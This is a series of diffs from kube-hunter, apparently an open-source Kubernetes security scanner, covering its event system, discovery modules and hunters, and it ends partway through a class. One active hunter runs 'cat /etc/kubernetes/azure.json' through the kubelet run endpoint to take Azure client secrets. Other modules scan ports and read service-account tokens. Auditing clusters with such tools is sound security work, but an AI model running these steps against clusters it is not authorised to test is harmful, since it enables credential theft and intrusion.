# if filters are subscribed, apply them on the event
for hooked_event in self.filters.keys():
if hooked_event in event.__class__.__mro__:
for filter_hook, predicate in self.filters[hooked_event]:
if predicate and not predicate(event):
continue
logger.debug(f"Event {event.__class__} filtered with {filter_hook}")
event = filter_hook(event).execute()
# if filter decided to remove event, returning None
if not event:
return None
return event
# getting instantiated event object
def publish_event(self, event, caller=None):
config = get_config()
# setting event chain
if caller:
event.previous = caller.event
event.hunter = caller.__class__
# applying filters on the event, before publishing it to subscribers.
# if filter returned None, not proceeding to publish
event = self.apply_filters(event)
if event:
# If event was rewritten, make sure it's linked to its parent ('previous') event
if caller:
event.previous = caller.event
event.hunter = caller.__class__
for hooked_event in self.hooks.keys():
if hooked_event in event.__class__.__mro__:
for hook, predicate in self.hooks[hooked_event]:
if predicate and not predicate(event):
continue
if config.statistics and caller:
if Vulnerability in event.__class__.__mro__:
caller.__class__.publishedVulnerabilities += 1
logger.debug(f"Event {event.__class__} got published with {event}")
self.put(hook(event))
# executes callbacks on dedicated thread as a daemon
def worker(self):
while self.running:
try:
hook = self.get()
logger.debug(f"Executing {hook.__class__} with {hook.event.__dict__}")
hook.execute()
except Exception as ex:
logger.debug(ex, exc_info=True)
finally:
self.task_done()
logger.debug("closing thread...")
def notifier(self):
time.sleep(2)
# should consider locking on unfinished_tasks
while self.unfinished_tasks > 0:
logger.debug(f"{self.unfinished_tasks} tasks left")
time.sleep(3)
if self.unfinished_tasks == 1:
logger.debug("final hook is hanging")
# stops execution of all daemons
def free(self):
self.running = False
with self.mutex:
self.queue.clear()
handler = EventQueue(800)

View File

@@ -0,0 +1,210 @@
import logging
import threading
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import (
InformationDisclosure,
DenialOfService,
RemoteCodeExec,
IdentityTheft,
PrivilegeEscalation,
AccessRisk,
UnauthenticatedAccess,
KubernetesCluster,
)
logger = logging.getLogger(__name__)
class EventFilterBase:
def __init__(self, event):
self.event = event
# Returns self.event as default.
# If changes has been made, should return the new event that's been altered
# Return None to indicate the event should be discarded
def execute(self):
return self.event
class Event:
def __init__(self):
self.previous = None
self.hunter = None
# newest attribute gets selected first
def __getattr__(self, name):
if name == "previous":
return None
for event in self.history:
if name in event.__dict__:
return event.__dict__[name]
# Event's logical location to be used mainly for reports.
# If event don't implement it check previous event
# This is because events are composed (previous -> previous ...)
# and not inherited
def location(self):
location = None
if self.previous:
location = self.previous.location()
return location
# returns the event history ordered from newest to oldest
@property
def history(self):
previous, history = self.previous, list()
while previous:
history.append(previous)
previous = previous.previous
return history
class Service:
def __init__(self, name, path="", secure=True):
self.name = name
self.secure = secure
self.path = path
self.role = "Node"
def get_name(self):
return self.name
def get_path(self):
return "/" + self.path if self.path else ""
def explain(self):
return self.__doc__
class Vulnerability:
severity = dict(
{
InformationDisclosure: "medium",
DenialOfService: "medium",
RemoteCodeExec: "high",
IdentityTheft: "high",
PrivilegeEscalation: "high",
AccessRisk: "low",
UnauthenticatedAccess: "low",
}
)
# TODO: make vid mandatory once migration is done
def __init__(self, component, name, category=None, vid="None"):
self.vid = vid
self.component = component
self.category = category
self.name = name
self.evidence = ""
self.role = "Node"
def get_vid(self):
return self.vid
def get_category(self):
if self.category:
return self.category.name
def get_name(self):
return self.name
def explain(self):
return self.__doc__
def get_severity(self):
return self.severity.get(self.category, "low")
event_id_count_lock = threading.Lock()
event_id_count = 0
class NewHostEvent(Event):
def __init__(self, host, cloud=None):
global event_id_count
self.host = host
self.cloud_type = cloud
with event_id_count_lock:
self.event_id = event_id_count
event_id_count += 1
@property
def cloud(self):
if not self.cloud_type:
self.cloud_type = self.get_cloud()
return self.cloud_type
def get_cloud(self):
config = get_config()
try:
logger.debug("Checking whether the cluster is deployed on azure's cloud")
# Leverage 3rd tool https://github.com/blrchen/AzureSpeed for Azure cloud ip detection
result = requests.get(
f"https://api.azurespeed.com/api/region?ipOrUrl={self.host}",
timeout=config.network_timeout,
).json()
return result["cloud"] or "NoCloud"
except requests.ConnectionError:
logger.info("Failed to connect cloud type service", exc_info=True)
except Exception:
logger.warning(f"Unable to check cloud of {self.host}", exc_info=True)
return "NoCloud"
def __str__(self):
return str(self.host)
# Event's logical location to be used mainly for reports.
def location(self):
return str(self.host)
class OpenPortEvent(Event):
def __init__(self, port):
self.port = port
def __str__(self):
return str(self.port)
# Event's logical location to be used mainly for reports.
def location(self):
if self.host:
location = str(self.host) + ":" + str(self.port)
else:
location = str(self.port)
return location
class HuntFinished(Event):
pass
class HuntStarted(Event):
pass
class ReportDispatched(Event):
pass
class K8sVersionDisclosure(Vulnerability, Event):
"""The kubernetes version could be obtained from the {} endpoint """
def __init__(self, version, from_endpoint, extra_info=""):
Vulnerability.__init__(
self,
KubernetesCluster,
"K8s Version Disclosure",
category=InformationDisclosure,
vid="KHV002",
)
self.version = version
self.from_endpoint = from_endpoint
self.extra_info = extra_info
self.evidence = version
def explain(self):
return self.__doc__.format(self.from_endpoint) + self.extra_info

88
kube_hunter/core/types.py Normal file
View File

@@ -0,0 +1,88 @@
class HunterBase:
publishedVulnerabilities = 0
@staticmethod
def parse_docs(docs):
"""returns tuple of (name, docs)"""
if not docs:
return __name__, "<no documentation>"
docs = docs.strip().split("\n")
for i, line in enumerate(docs):
docs[i] = line.strip()
return docs[0], " ".join(docs[1:]) if len(docs[1:]) else "<no documentation>"
@classmethod
def get_name(cls):
name, _ = cls.parse_docs(cls.__doc__)
return name
def publish_event(self, event):
handler.publish_event(event, caller=self)
class ActiveHunter(HunterBase):
pass
class Hunter(HunterBase):
pass
class Discovery(HunterBase):
pass
class KubernetesCluster:
"""Kubernetes Cluster"""
name = "Kubernetes Cluster"
class KubectlClient:
"""The kubectl client binary is used by the user to interact with the cluster"""
name = "Kubectl Client"
class Kubelet(KubernetesCluster):
"""The kubelet is the primary "node agent" that runs on each node"""
name = "Kubelet"
class Azure(KubernetesCluster):
"""Azure Cluster"""
name = "Azure"
class InformationDisclosure:
name = "Information Disclosure"
class RemoteCodeExec:
name = "Remote Code Execution"
class IdentityTheft:
name = "Identity Theft"
class UnauthenticatedAccess:
name = "Unauthenticated Access"
class AccessRisk:
name = "Access Risk"
class PrivilegeEscalation(KubernetesCluster):
name = "Privilege Escalation"
class DenialOfService:
name = "Denial of Service"
# import is in the bottom to break import loops
from .events import handler # noqa

View File

@@ -1,3 +1,4 @@
# flake8: noqa: E402
from . import report
from . import discovery
from . import hunting

View File

@@ -0,0 +1,11 @@
# flake8: noqa: E402
from . import (
apiserver,
dashboard,
etcd,
hosts,
kubectl,
kubelet,
ports,
proxy,
)

View File

@@ -0,0 +1,126 @@
import logging
import requests
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import OpenPortEvent, Service, Event, EventFilterBase
from kube_hunter.conf import get_config
KNOWN_API_PORTS = [443, 6443, 8080]
logger = logging.getLogger(__name__)
class K8sApiService(Service, Event):
"""A Kubernetes API service"""
def __init__(self, protocol="https"):
Service.__init__(self, name="Unrecognized K8s API")
self.protocol = protocol
class ApiServer(Service, Event):
"""The API server is in charge of all operations on the cluster."""
def __init__(self):
Service.__init__(self, name="API Server")
self.protocol = "https"
class MetricsServer(Service, Event):
"""The Metrics server is in charge of providing resource usage metrics for pods and nodes to the API server"""
def __init__(self):
Service.__init__(self, name="Metrics Server")
self.protocol = "https"
# Other devices could have this port open, but we can check to see if it looks like a Kubernetes api
# A Kubernetes API service will respond with a JSON message that includes a "code" field for the HTTP status code
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in KNOWN_API_PORTS)
class ApiServiceDiscovery(Discovery):
"""API Service Discovery
Checks for the existence of K8s API Services
"""
def __init__(self, event):
self.event = event
self.session = requests.Session()
self.session.verify = False
def execute(self):
logger.debug(f"Attempting to discover an API service on {self.event.host}:{self.event.port}")
protocols = ["http", "https"]
for protocol in protocols:
if self.has_api_behaviour(protocol):
self.publish_event(K8sApiService(protocol))
def has_api_behaviour(self, protocol):
config = get_config()
try:
r = self.session.get(f"{protocol}://{self.event.host}:{self.event.port}", timeout=config.network_timeout)
if ("k8s" in r.text) or ('"code"' in r.text and r.status_code != 200):
return True
except requests.exceptions.SSLError:
logger.debug(f"{[protocol]} protocol not accepted on {self.event.host}:{self.event.port}")
except Exception:
logger.debug(f"Failed probing {self.event.host}:{self.event.port}", exc_info=True)
# Acts as a Filter for services, In the case that we can classify the API,
# We swap the filtered event with a new corresponding Service to next be published
# The classification can be regarding the context of the execution,
# Currently we classify: Metrics Server and Api Server
# If running as a pod:
# We know the Api server IP, so we can classify easily
# If not:
# We determine by accessing the /version on the service.
# Api Server will contain a major version field, while the Metrics will not
@handler.subscribe(K8sApiService)
class ApiServiceClassify(EventFilterBase):
"""API Service Classifier
Classifies an API service
"""
def __init__(self, event):
self.event = event
self.classified = False
self.session = requests.Session()
self.session.verify = False
# Using the auth token if we can, for the case that authentication is needed for our checks
if self.event.auth_token:
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
def classify_using_version_endpoint(self):
"""Tries to classify by accessing /version. if could not access succeded, returns"""
config = get_config()
try:
endpoint = f"{self.event.protocol}://{self.event.host}:{self.event.port}/version"
versions = self.session.get(endpoint, timeout=config.network_timeout).json()
if "major" in versions:
if versions.get("major") == "":
self.event = MetricsServer()
else:
self.event = ApiServer()
except Exception:
logging.warning("Could not access /version on API service", exc_info=True)
def execute(self):
discovered_protocol = self.event.protocol
# if running as pod
if self.event.kubeservicehost:
# if the host is the api server's IP, we know it's the Api Server
if self.event.kubeservicehost == str(self.event.host):
self.event = ApiServer()
else:
self.event = MetricsServer()
# if not running as pod.
else:
self.classify_using_version_endpoint()
# in any case, making sure to link previously discovered protocol
self.event.protocol = discovered_protocol
# If some check classified the Service,
# the event will have been replaced.
return self.event

View File

@@ -0,0 +1,44 @@
import json
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
from kube_hunter.core.types import Discovery
logger = logging.getLogger(__name__)
class KubeDashboardEvent(Service, Event):
"""A web-based Kubernetes user interface allows easy usage with operations on the cluster"""
def __init__(self, **kargs):
Service.__init__(self, name="Kubernetes Dashboard", **kargs)
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 30000)
class KubeDashboard(Discovery):
"""K8s Dashboard Discovery
Checks for the existence of a Dashboard
"""
def __init__(self, event):
self.event = event
@property
def secure(self):
config = get_config()
endpoint = f"http://{self.event.host}:{self.event.port}/api/v1/service/default"
logger.debug("Attempting to discover an Api server to access dashboard")
try:
r = requests.get(endpoint, timeout=config.network_timeout)
if "listMeta" in r.text and len(json.loads(r.text)["errors"]) == 0:
return False
except requests.Timeout:
logger.debug(f"failed getting {endpoint}", exc_info=True)
return True
def execute(self):
if not self.secure:
self.publish_event(KubeDashboardEvent())

View File

@@ -1,26 +1,22 @@
import json
import logging
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, OpenPortEvent, Service
from kube_hunter.core.types import Discovery
import requests
from ...core.events import handler
from ...core.events.types import Event, OpenPortEvent, Service
from ...core.types import Hunter
# Service:
class EtcdAccessEvent(Service, Event):
"""Etcd is a DB that stores cluster's data, it contains configuration and current state information, and might contain secrets"""
"""Etcd is a DB that stores cluster's data, it contains configuration and current
state information, and might contain secrets"""
def __init__(self):
Service.__init__(self, name="Etcd")
@handler.subscribe(OpenPortEvent, predicate= lambda p: p.port == 2379)
class EtcdRemoteAccess(Hunter):
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == 2379)
class EtcdRemoteAccess(Discovery):
"""Etcd service
check for the existence of etcd service
"""
def __init__(self, event):
self.event = event

View File

@@ -0,0 +1,209 @@
import os
import logging
import itertools
import requests
from enum import Enum
from netaddr import IPNetwork, IPAddress, AddrFormatError
from netifaces import AF_INET, ifaddresses, interfaces, gateways
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, NewHostEvent, Vulnerability
from kube_hunter.core.types import Discovery, InformationDisclosure, Azure
logger = logging.getLogger(__name__)
class RunningAsPodEvent(Event):
def __init__(self):
self.name = "Running from within a pod"
self.auth_token = self.get_service_account_file("token")
self.client_cert = self.get_service_account_file("ca.crt")
self.namespace = self.get_service_account_file("namespace")
self.kubeservicehost = os.environ.get("KUBERNETES_SERVICE_HOST", None)
# Event's logical location to be used mainly for reports.
def location(self):
location = "Local to Pod"
hostname = os.getenv("HOSTNAME")
if hostname:
location += f" ({hostname})"
return location
def get_service_account_file(self, file):
try:
with open(f"/var/run/secrets/kubernetes.io/serviceaccount/{file}") as f:
return f.read()
except OSError:
pass
class AzureMetadataApi(Vulnerability, Event):
"""Access to the Azure Metadata API exposes information about the machines associated with the cluster"""
def __init__(self, cidr):
Vulnerability.__init__(
self,
Azure,
"Azure Metadata Exposure",
category=InformationDisclosure,
vid="KHV003",
)
self.cidr = cidr
self.evidence = f"cidr: {cidr}"
class HostScanEvent(Event):
def __init__(self, pod=False, active=False, predefined_hosts=None):
# flag to specify whether to get actual data from vulnerabilities
self.active = active
self.predefined_hosts = predefined_hosts or []
class HostDiscoveryHelpers:
# generator, generating a subnet by given a cidr
@staticmethod
def filter_subnet(subnet, ignore=None):
for ip in subnet:
if ignore and any(ip in s for s in ignore):
logger.debug(f"HostDiscoveryHelpers.filter_subnet ignoring {ip}")
else:
yield ip
@staticmethod
def generate_hosts(cidrs):
ignore = list()
scan = list()
for cidr in cidrs:
try:
if cidr.startswith("!"):
ignore.append(IPNetwork(cidr[1:]))
else:
scan.append(IPNetwork(cidr))
except AddrFormatError as e:
raise ValueError(f"Unable to parse CIDR {cidr}") from e
return itertools.chain.from_iterable(HostDiscoveryHelpers.filter_subnet(sb, ignore=ignore) for sb in scan)
@handler.subscribe(RunningAsPodEvent)
class FromPodHostDiscovery(Discovery):
"""Host Discovery when running as pod
Generates ip adresses to scan, based on cluster/scan type
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
# Scan any hosts that the user specified
if config.remote or config.cidr:
self.publish_event(HostScanEvent())
else:
# Discover cluster subnets, we'll scan all these hosts
cloud = None
if self.is_azure_pod():
subnets, cloud = self.azure_metadata_discovery()
else:
subnets = self.gateway_discovery()
should_scan_apiserver = False
if self.event.kubeservicehost:
should_scan_apiserver = True
for ip, mask in subnets:
if self.event.kubeservicehost and self.event.kubeservicehost in IPNetwork(f"{ip}/{mask}"):
should_scan_apiserver = False
logger.debug(f"From pod scanning subnet {ip}/{mask}")
for ip in IPNetwork(f"{ip}/{mask}"):
self.publish_event(NewHostEvent(host=ip, cloud=cloud))
if should_scan_apiserver:
self.publish_event(NewHostEvent(host=IPAddress(self.event.kubeservicehost), cloud=cloud))
def is_azure_pod(self):
config = get_config()
try:
logger.debug("From pod attempting to access Azure Metadata API")
if (
requests.get(
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
headers={"Metadata": "true"},
timeout=config.network_timeout,
).status_code
== 200
):
return True
except requests.exceptions.ConnectionError:
logger.debug("Failed to connect Azure metadata server")
return False
# for pod scanning
def gateway_discovery(self):
""" Retrieving default gateway of pod, which is usually also a contact point with the host """
return [[gateways()["default"][AF_INET][0], "24"]]
# querying azure's interface metadata api | works only from a pod
def azure_metadata_discovery(self):
config = get_config()
logger.debug("From pod attempting to access azure's metadata")
machine_metadata = requests.get(
"http://169.254.169.254/metadata/instance?api-version=2017-08-01",
headers={"Metadata": "true"},
timeout=config.network_timeout,
).json()
address, subnet = "", ""
subnets = list()
for interface in machine_metadata["network"]["interface"]:
address, subnet = (
interface["ipv4"]["subnet"][0]["address"],
interface["ipv4"]["subnet"][0]["prefix"],
)
subnet = subnet if not config.quick else "24"
logger.debug(f"From pod discovered subnet {address}/{subnet}")
subnets.append([address, subnet if not config.quick else "24"])
self.publish_event(AzureMetadataApi(cidr=f"{address}/{subnet}"))
return subnets, "Azure"
@handler.subscribe(HostScanEvent)
class HostDiscovery(Discovery):
"""Host Discovery
Generates ip adresses to scan, based on cluster/scan type
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
if config.cidr:
for ip in HostDiscoveryHelpers.generate_hosts(config.cidr):
self.publish_event(NewHostEvent(host=ip))
elif config.interface:
self.scan_interfaces()
elif len(config.remote) > 0:
for host in config.remote:
self.publish_event(NewHostEvent(host=host))
# for normal scanning
def scan_interfaces(self):
for ip in self.generate_interfaces_subnet():
handler.publish_event(NewHostEvent(host=ip))
# generate all subnets from all internal network interfaces
def generate_interfaces_subnet(self, sn="24"):
for ifaceName in interfaces():
for ip in [i["addr"] for i in ifaddresses(ifaceName).setdefault(AF_INET, [])]:
if not self.event.localhost and InterfaceTypes.LOCALHOST.value in ip.__str__():
continue
for ip in IPNetwork(f"{ip}/{sn}"):
yield ip
# for comparing prefixes
class InterfaceTypes(Enum):
LOCALHOST = "127"

View File

@@ -0,0 +1,49 @@
import logging
import subprocess
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import HuntStarted, Event
logger = logging.getLogger(__name__)
class KubectlClientEvent(Event):
"""The API server is in charge of all operations on the cluster."""
def __init__(self, version):
self.version = version
def location(self):
return "local machine"
# Will be triggered on start of every hunt
@handler.subscribe(HuntStarted)
class KubectlClientDiscovery(Discovery):
"""Kubectl Client Discovery
Checks for the existence of a local kubectl client
"""
def __init__(self, event):
self.event = event
def get_kubectl_binary_version(self):
version = None
try:
# kubectl version --client does not make any connection to the cluster/internet whatsoever.
version_info = subprocess.check_output("kubectl version --client", stderr=subprocess.STDOUT)
if b"GitVersion" in version_info:
# extracting version from kubectl output
version_info = version_info.decode()
start = version_info.find("GitVersion")
version = version_info[start + len("GitVersion':\"") : version_info.find('",', start)]
except Exception:
logger.debug("Could not find kubectl client")
return version
def execute(self):
logger.debug("Attempting to discover a local kubectl client")
version = self.get_kubectl_binary_version()
if version:
self.publish_event(KubectlClientEvent(version=version))

View File

@@ -1,65 +1,77 @@
import json
import logging
from enum import Enum
from ...core.types import Hunter, Kubelet
import requests
import urllib3
from enum import Enum
from kube_hunter.conf import get_config
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import OpenPortEvent, Event, Service
from ...core.events import handler
from ...core.events.types import OpenPortEvent, Vulnerability, Event, Service
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logger = logging.getLogger(__name__)
""" Services """
class ReadOnlyKubeletEvent(Service, Event):
"""The read-only port on the kubelet serves health probing endpoints, and is relied upon by many kubernetes componenets"""
"""The read-only port on the kubelet serves health probing endpoints,
and is relied upon by many kubernetes components"""
def __init__(self):
Service.__init__(self, name="Kubelet API (readonly)")
class SecureKubeletEvent(Service, Event):
"""The Kubelet is the main component in every Node, all pod operations goes through the kubelet"""
def __init__(self, cert=False, token=False, anonymous_auth=True, **kwargs):
self.cert = cert
self.token = token
self.anonymous_auth = anonymous_auth
Service.__init__(self, name="Kubelet API", **kwargs)
Service.__init__(self, name="Kubelet API", **kwargs)
class KubeletPorts(Enum):
SECURED = 10250
READ_ONLY = 10255
@handler.subscribe(OpenPortEvent, predicate= lambda x: x.port == 10255 or x.port == 10250)
class KubeletDiscovery(Hunter):
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port in [10250, 10255])
class KubeletDiscovery(Discovery):
"""Kubelet Discovery
Checks for the existence of a Kubelet service, and its open ports
"""
def __init__(self, event):
self.event = event
def get_read_only_access(self):
logging.debug(self.event.host)
logging.debug("Passive hunter is attempting to get kubelet read access")
r = requests.get("http://{host}:{port}/pods".format(host=self.event.host, port=self.event.port))
config = get_config()
endpoint = f"http://{self.event.host}:{self.event.port}/pods"
logger.debug(f"Trying to get kubelet read access at {endpoint}")
r = requests.get(endpoint, timeout=config.network_timeout)
if r.status_code == 200:
self.publish_event(ReadOnlyKubeletEvent())
def get_secure_access(self):
logging.debug("Attempting to get kubelet secure access")
logger.debug("Attempting to get kubelet secure access")
ping_status = self.ping_kubelet()
if ping_status == 200:
self.publish_event(SecureKubeletEvent(secure=False))
elif ping_status == 403:
elif ping_status == 403:
self.publish_event(SecureKubeletEvent(secure=True))
elif ping_status == 401:
self.publish_event(SecureKubeletEvent(secure=True, anonymous_auth=False))
def ping_kubelet(self):
logging.debug("Attempting to get pod info from kubelet")
config = get_config()
endpoint = f"https://{self.event.host}:{self.event.port}/pods"
logger.debug("Attempting to get pods info from kubelet")
try:
return requests.get("https://{host}:{port}/pods".format(host=self.event.host, port=self.event.port), verify=False).status_code
except Exception as ex:
logging.debug("Failed pinging https port 10250 on {} : {}".format(self.event.host, ex.message))
return requests.get(endpoint, verify=False, timeout=config.network_timeout).status_code
except Exception:
logger.debug(f"Failed pinging https port on {endpoint}", exc_info=True)
def execute(self):
if self.event.port == KubeletPorts.SECURED.value:

View File

@@ -1,39 +1,43 @@
import logging
from socket import socket
from ...core.types import Hunter
from ...core.events import handler
from ...core.events.types import NewHostEvent, OpenPortEvent
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
logger = logging.getLogger(__name__)
default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
default_ports = [8001, 10250, 10255, 30000, 443, 6443, 2379]
@handler.subscribe(NewHostEvent)
class PortDiscovery(Hunter):
class PortDiscovery(Discovery):
"""Port Scanning
Scans Kubernetes known ports to determine open endpoints for discovery
"""
def __init__(self, event):
self.event = event
self.host = event.host
self.port = event.port
def execute(self):
logging.debug("host {0} try ports: {1}".format(self.host, default_ports))
logger.debug(f"host {self.host} try ports: {default_ports}")
for single_port in default_ports:
if self.test_connection(self.host, single_port):
logging.debug("Reachable port found: {0}".format(single_port))
logger.debug(f"Reachable port found: {single_port}")
self.publish_event(OpenPortEvent(port=single_port))
@staticmethod
def test_connection(host, port):
s = socket()
s.settimeout(1.5)
try:
try:
logger.debug(f"Scanning {host}:{port}")
success = s.connect_ex((str(host), port))
if success == 0:
return True
except: pass
finally: s.close()
except Exception:
logger.debug(f"Failed to probe {host}:{port}")
finally:
s.close()
return False

View File

@@ -0,0 +1,45 @@
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import Discovery
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Service, Event, OpenPortEvent
logger = logging.getLogger(__name__)
class KubeProxyEvent(Event, Service):
"""proxies from a localhost address to the Kubernetes apiserver"""
def __init__(self):
Service.__init__(self, name="Kubernetes Proxy")
@handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
class KubeProxy(Discovery):
"""Proxy Discovery
Checks for the existence of a an open Proxy service
"""
def __init__(self, event):
self.event = event
self.host = event.host
self.port = event.port or 8001
@property
def accesible(self):
config = get_config()
endpoint = f"http://{self.host}:{self.port}/api/v1"
logger.debug("Attempting to discover a proxy service")
try:
r = requests.get(endpoint, timeout=config.network_timeout)
if r.status_code == 200 and "APIResourceList" in r.text:
return True
except requests.Timeout:
logger.debug(f"failed to get {endpoint}", exc_info=True)
return False
def execute(self):
if self.accesible:
self.publish_event(KubeProxyEvent())

View File

@@ -0,0 +1,16 @@
# flake8: noqa: E402
from . import (
aks,
apiserver,
arp,
capabilities,
certificates,
cves,
dashboard,
dns,
etcd,
kubelet,
mounts,
proxy,
secrets,
)

View File

@@ -0,0 +1,99 @@
import json
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.hunting.kubelet import ExposedRunHandler
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, ActiveHunter, IdentityTheft, Azure
logger = logging.getLogger(__name__)
class AzureSpnExposure(Vulnerability, Event):
"""The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
def __init__(self, container):
Vulnerability.__init__(
self,
Azure,
"Azure SPN Exposure",
category=IdentityTheft,
vid="KHV004",
)
self.container = container
@handler.subscribe(ExposedRunHandler, predicate=lambda x: x.cloud == "Azure")
class AzureSpnHunter(Hunter):
"""AKS Hunting
Hunting Azure cluster deployments using specific known configurations
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:{self.event.port}"
# getting a container that has access to the azure.json file
def get_key_container(self):
config = get_config()
endpoint = f"{self.base_url}/pods"
logger.debug("Trying to find container with access to azure.json file")
try:
r = requests.get(endpoint, verify=False, timeout=config.network_timeout)
except requests.Timeout:
logger.debug("failed getting pod info")
else:
pods_data = r.json().get("items", [])
suspicious_volume_names = []
for pod_data in pods_data:
for volume in pod_data["spec"].get("volumes", []):
if volume.get("hostPath"):
path = volume["hostPath"]["path"]
if "/etc/kubernetes/azure.json".startswith(path):
suspicious_volume_names.append(volume["name"])
for container in pod_data["spec"]["containers"]:
for mount in container.get("volumeMounts", []):
if mount["name"] in suspicious_volume_names:
return {
"name": container["name"],
"pod": pod_data["metadata"]["name"],
"namespace": pod_data["metadata"]["namespace"],
}
def execute(self):
container = self.get_key_container()
if container:
self.publish_event(AzureSpnExposure(container=container))
@handler.subscribe(AzureSpnExposure)
class ProveAzureSpnExposure(ActiveHunter):
"""Azure SPN Hunter
Gets the azure subscription file on the host by executing inside a container
"""
def __init__(self, event):
self.event = event
self.base_url = f"https://{self.event.host}:{self.event.port}"
def run(self, command, container):
config = get_config()
run_url = "/".join(self.base_url, "run", container["namespace"], container["pod"], container["name"])
return requests.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
def execute(self):
try:
subscription = self.run("cat /etc/kubernetes/azure.json", container=self.event.container).json()
except requests.Timeout:
logger.debug("failed to run command in container", exc_info=True)
except json.decoder.JSONDecodeError:
logger.warning("failed to parse SPN")
else:
if "subscriptionId" in subscription:
self.event.subscriptionId = subscription["subscriptionId"]
self.event.aadClientId = subscription["aadClientId"]
self.event.aadClientSecret = subscription["aadClientSecret"]
self.event.tenantId = subscription["tenantId"]
self.event.evidence = f"subscription: {self.event.subscriptionId}"

View File

@@ -0,0 +1,643 @@
import logging
import json
import uuid
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.apiserver import ApiServer
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
from kube_hunter.core.types import (
AccessRisk,
InformationDisclosure,
UnauthenticatedAccess,
)
logger = logging.getLogger(__name__)
class ServerApiAccess(Vulnerability, Event):
"""The API Server port is accessible.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence, using_token):
if using_token:
name = "Access to API using service account token"
category = InformationDisclosure
else:
name = "Unauthenticated access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV005",
)
self.evidence = evidence
class ServerApiHTTPAccess(Vulnerability, Event):
"""The API Server port is accessible over HTTP, and therefore unencrypted.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence):
name = "Insecure (HTTP) access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV006",
)
self.evidence = evidence
class ApiInfoDisclosure(Vulnerability, Event):
"""Information Disclosure depending upon RBAC permissions and Kube-Cluster Setup"""
def __init__(self, evidence, using_token, name):
category = InformationDisclosure
if using_token:
name += " using default service account token"
else:
name += " as anonymous user"
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV007",
)
self.evidence = evidence
class ListPodsAndNamespaces(ApiInfoDisclosure):
""" Accessing pods might give an attacker valuable information"""
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")
class ListNamespaces(ApiInfoDisclosure):
""" Accessing namespaces might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")
class ListRoles(ApiInfoDisclosure):
""" Accessing roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")
class ListClusterRoles(ApiInfoDisclosure):
""" Accessing cluster roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")
class CreateANamespace(Vulnerability, Event):
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a namespace",
category=AccessRisk,
)
self.evidence = evidence
class DeleteANamespace(Vulnerability, Event):
""" Deleting a namespace might give an attacker the option to affect application behavior """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Delete a namespace",
category=AccessRisk,
)
self.evidence = evidence
class CreateARole(Vulnerability, Event):
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
within the specified namespaces.
"""
def __init__(self, evidence):
Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=AccessRisk)
self.evidence = evidence
class CreateAClusterRole(Vulnerability, Event):
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
across the whole cluster
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class PatchARole(Vulnerability, Event):
"""Patching a role might give an attacker the option to create new pods with custom roles within the
specific role's namespace scope
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a role",
category=AccessRisk,
)
self.evidence = evidence
class PatchAClusterRole(Vulnerability, Event):
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
cluster scope.
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteARole(Vulnerability, Event):
